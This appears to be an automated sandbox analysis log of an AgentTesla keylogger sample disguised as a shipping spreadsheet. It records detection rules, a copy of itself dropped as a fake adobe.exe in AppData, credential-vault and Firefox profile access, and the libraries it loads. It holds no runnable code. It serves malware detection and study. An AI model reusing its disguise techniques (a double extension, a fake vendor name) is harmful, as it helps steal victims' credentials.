                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_06D2E5E83_2_06D2E5E8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_06D200403_2_06D20040
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 3_2_06D2003F3_2_06D2003F
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_0108A5D08_2_0108A5D0
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_01084A908_2_01084A90
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_0108ADA88_2_0108ADA8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_01083E788_2_01083E78
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_010841C08_2_010841C0
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_01080D588_2_01080D58
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_067D27508_2_067D2750
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_067D7CF88_2_067D7CF8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_067D65608_2_067D6560
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_067D55508_2_067D5550
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_067DC0F88_2_067DC0F8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_067DB1A88_2_067DB1A8
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_067D76188_2_067D7618
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_067D5C608_2_067D5C60
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_067DE3288_2_067DE328
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_067D00408_2_067D0040
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeCode function: 8_2_067D00388_2_067D0038
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000000.00000002.1751062194.000000000109E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Ship Docs YINGHAI-MANE PO 240786.xlsx.exe
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000000.00000002.1751703167.0000000003D35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea9d26a1c-7dc5-441c-98a8-6dd01f6d79df.exe4 vs Ship Docs YINGHAI-MANE PO 240786.xlsx.exe
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000000.00000000.1748374852.0000000000A42000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameuvDIpSw.exeH vs Ship Docs YINGHAI-MANE PO 240786.xlsx.exe
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000000.00000002.1752622729.00000000052E0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea9d26a1c-7dc5-441c-98a8-6dd01f6d79df.exe4 vs Ship Docs YINGHAI-MANE PO 240786.xlsx.exe
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, 00000001.00000002.4195698044.0000000000CF9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Ship Docs YINGHAI-MANE PO 240786.xlsx.exe
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exeBinary or memory string: OriginalFilenameuvDIpSw.exeH vs Ship Docs YINGHAI-MANE PO 240786.xlsx.exe
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e4a770.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e4a770.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e0f140.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e0f140.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.52e0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.52e0000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e4a770.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e4a770.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 3.2.adobe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 3.2.adobe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.52e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.52e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e0f140.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e0f140.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 00000000.00000002.1752622729.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 00000000.00000002.1752622729.00000000052E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: adobe.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exe, eIwn.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e0f140.1.raw.unpack, yNzg.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e0f140.1.raw.unpack, yNzg.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e0f140.1.raw.unpack, yNzg.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e0f140.1.raw.unpack, yNzg.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e0f140.1.raw.unpack, KNymkUU5gB.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e0f140.1.raw.unpack, KNymkUU5gB.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e0f140.1.raw.unpack, LPE.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.3e0f140.1.raw.unpack, LPE.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/4@2/2
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe.logJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMutant created: NULL
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exeReversingLabs: Detection: 42%
                    Source: Ship Docs YINGHAI-MANE PO 240786.xlsx.exeVirustotal: Detection: 50%
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeFile read: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe "C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe"
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess created: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe "C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeProcess created: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe "C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\Ship Docs YINGHAI-MANE PO 240786.xlsx.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeSection loaded: rtutils.dllJump to behavior
